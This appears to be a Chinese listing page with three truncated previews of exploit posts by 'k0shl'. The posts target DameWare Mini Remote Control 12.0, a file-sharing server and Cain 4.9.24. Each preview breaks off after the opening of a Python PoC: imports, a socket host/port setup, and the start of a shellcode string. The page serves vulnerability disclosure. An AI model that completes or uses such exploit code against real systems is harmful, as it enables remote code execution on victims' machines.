作者:k0shl 转载请注明出处

漏洞说明

软件版本是DameWare Mini Remote Control 12.0，可以去网上搜索直接下载

PoC:

import socket

import sys

import os

import time

import struct

import binascii

import random

# windows/exec - 2......

作者:k0shl 转载请注明出处

漏洞说明

软件下载：

https://www.exploit-db.com/apps/60f3ff1f3cd34dec80fba130ea481f31-efssetup.exe

PoC:

import socket

import sys

host = str(sys.argv[1])

port = int(sys.argv[2])

a......

作者:k0shl 转载请注明出处

漏洞说明

软件下载：

Cain 4.9.24版本

PoC:

#!/usr/bin/python

#coding:utf-8

#poc仅供验证，如果有需要可以替换成exploit

shellcode =("\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x19"

"......